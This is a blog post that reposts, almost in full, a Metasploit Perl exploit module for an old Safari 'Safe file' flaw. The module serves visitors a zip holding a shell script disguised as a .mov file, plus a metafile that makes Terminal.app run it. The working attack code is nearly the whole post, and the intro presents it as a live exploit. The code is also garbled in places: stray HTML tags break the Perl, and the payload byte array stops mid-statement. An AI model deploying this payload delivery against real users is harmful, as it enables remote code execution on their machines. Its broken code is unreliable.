Apple Mac OS X / Safari “__MACOSX” ZIP archive Remote Code Execution Exploit

10 Jan, 2008 Exploitative, Geeks, Security

(No Ratings Yet)

Loading ...

This is an interesting and apparently "critical" live exploit for remote code execution through Safari. Below is the Metasploit file.

Exploit code just after the break.

PLAIN TEXT

#
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::safari_safefiles_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;
use FindBin qw{$RealBin};
my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
};
my $info =
{
'Name' => 'Safari Archive Metadata Command Execution',
'Version' => '$Revision: 1.3 $',
'Authors' =>
[
'H D Moore <hdm>
],</hdm>
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a vulnerability in Safari's "Safe file"
feature, which will
automatically open any file with one of the allowed extensions. This can
be abused
by supplying a zip file, containing a shell script, with a metafile
indicating
that the file should be opened by Terminal.app. This module depends on
the 'zip' command-line utility.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host',
"0.0.0.0" ],
'REALHOST' => [ 0, 'HOST', 'External address to use for redirects
(NAT)' ],
},
'Payload' =>
{
'Space' => 8000,
'MinNops' => 0,
'MaxNops' => 0,
'Keys' => ['cmd', 'cmd_bash'],
},
'Refs' =>
[
['URL', 'http://www.heise.de/english/newsticker/news/69862'],
['BID', '16736'],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic' ]
],
'Keys' => [ 'safari' ],
'DisclosureDate' => 'Feb 21 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' =>
$advanced}, @_);
return($self);
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;
# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on
" . $self->GetVar('HTTPPORT'));
return;
}
my $httphost = $self->GetVar('HTTPHOST');
$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
$self->PrintLine("[*] Waiting for connections to http://".
$httphost .":". $self->GetVar('HTTPPORT') ."/");
while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
sub HandleHttpClient
{
my $self = shift;
my $fd = shift;
# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Read the HTTP command
my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
my $agent;
# Read in the HTTP headers
while ((my $line = $fd->RecvLine(10))) {
$line =~ s/^\s+|\s+$//g;
my ($var, $val) = split(/\:/, $line, 2);
# Break out if we reach the end of the headers
last if (not defined($var) or not defined($val));
$agent = $val if $var =~ /User-Agent/i;
}
my $target = $self->Targets->[$self->GetVar('TARGET')];
my $shellcode = $self->GetVar('EncodedPayload')->RawPayload;
my $content = $self->CreateZip($shellcode) || return;
$self->PrintLine("[*] HTTP Client connected from $rhost:$rport,
sending ".length($shellcode)."
bytes of payload...");
$fd->Send($self->BuildResponse($content));
select(undef, undef, undef, 0.1);
$fd->Close();
}
sub RandomHeaders {
my $self = shift;
my $head = '';
while (length($head) <3072) {
$head .= "X-" .
Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
Pex::Text::AlphaNumText(int(rand(256) + 5)) ."\r\n";
}
return $head;
}
sub BuildResponse {
my ($self, $content) = @_;
my $response =
"HTTP/1.1 200 OK\r\n" .
$self->RandomHeaders() .
"Content-Type: application/zip\r\n";
if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gzip\r\n";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunked\r\n";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "\r\n" .
"Connection: close\r\n";
}
$response .= "\r\n" . $content;
return $response;
}
sub Chunk {
my ($self, $content) = @_;
my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
}
$chunked .= "0\r\n\r\n";
return $chunked;
}
sub Gzip {
my $self = shift;
my $data = shift;
my $comp = int(rand(5))+5;
my($wtr, $rdr, $err);
my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
print $wtr $data;
close ($wtr);
local $/;
return (<$rdr>);
}
# Lame!
sub CreateZip {
my $self = shift;
my $cmds = shift;
my $data = $cmds."\n";
my $name = Pex::Text::AlphaNumText(int(rand(10)+4)).".mov";
my $temp = ($ENV{'HOME'} || $RealBin || "/tmp") .
"/msf_safari_temp_".Pex::Text::AlphaNumText(16);
if ($self->GotZip != 0) {
$self->PrintLine("[*] Could not execute the zip command (or zip
returned an error)");
return;
}
if (! mkdir($temp,0755)) {
$self->PrintLine("[*] Could not create a temporary directory:
$!");
return;
}
if (! chdir($temp)) {
$self->PrintLine("[*] Could not change into temporary directory:
$!");
$self->Nuke($temp);
return;
}
if (! mkdir("$temp/__MACOSX",0755)) {
$self->PrintLine("[*] Could not create the MACOSX temporary
directory: $!");
return $self->Nuke($temp);
return;
}
if (! open(TMP, ">$temp/$name")) {
$self->PrintLine("[*] Could not create the shell script:
$!");
$self->Nuke($temp);
return;
}
print TMP $data;
close(TMP);
# This is important
chmod(0755, "$temp/$name");
if (! open(TMP, ">$temp/__MACOSX/._".$name)) {
$self->PrintLine("[*] Could not create the metafile: $!");
$self->Nuke($temp);
return;
}
print TMP $self->OSXMetaFile;
close(TMP);
system("zip", "exploit.zip", $name,
"__MACOSX/._".$name);
if( ! open(TMP, "<"."exploit.zip")) {
$self->PrintLine("[*] Failed to create exploit.zip (weird zip
command?)");
$self->Nuke($temp);
return;
}
my $xzip;
while (<tmp>) { $xzip .= $_ }
close (TMP);</tmp>
$self->Nuke($temp);
return $xzip;
}
sub Nuke {
my $self = shift;
my $temp = shift;
system("rm", "-rf", $temp);
return;
}
sub GotZip {
return system("zip -h>/dev/null 2>&1");
}
sub OSXMetaFile {
return
"\x00\x05\x16\x07\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00".
"\x00\x32\x00\x00\x00\x20\x00\x00\x00\x02\x00\x00\x00\x52\x00\x00".
"\x05\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x01\x00\x00\x00\x05\x08\x00\x00\x04\x08\x00\x00".
"\x00\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x04\x00\x00\x00\x25\x2f\x41\x70\x70\x6c\x69".
"\x63\x61\x74\x69\x6f\x6e\x73\x2f\x55\x74\x69\x6c\x69\x74\x69\x65".
"\x73\x2f\x54\x65\x72\x6d\x69\x6e\x61\x6c\x2e\x61\x70\x70\x00\xec".
"\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec".
"\xec\xec\xff\xec\xec\xec\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".
"\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1".

Menekali Just another IT Blog.

Apple Mac OS X / Safari “__MACOSX” ZIP archive Remote Code Execution Exploit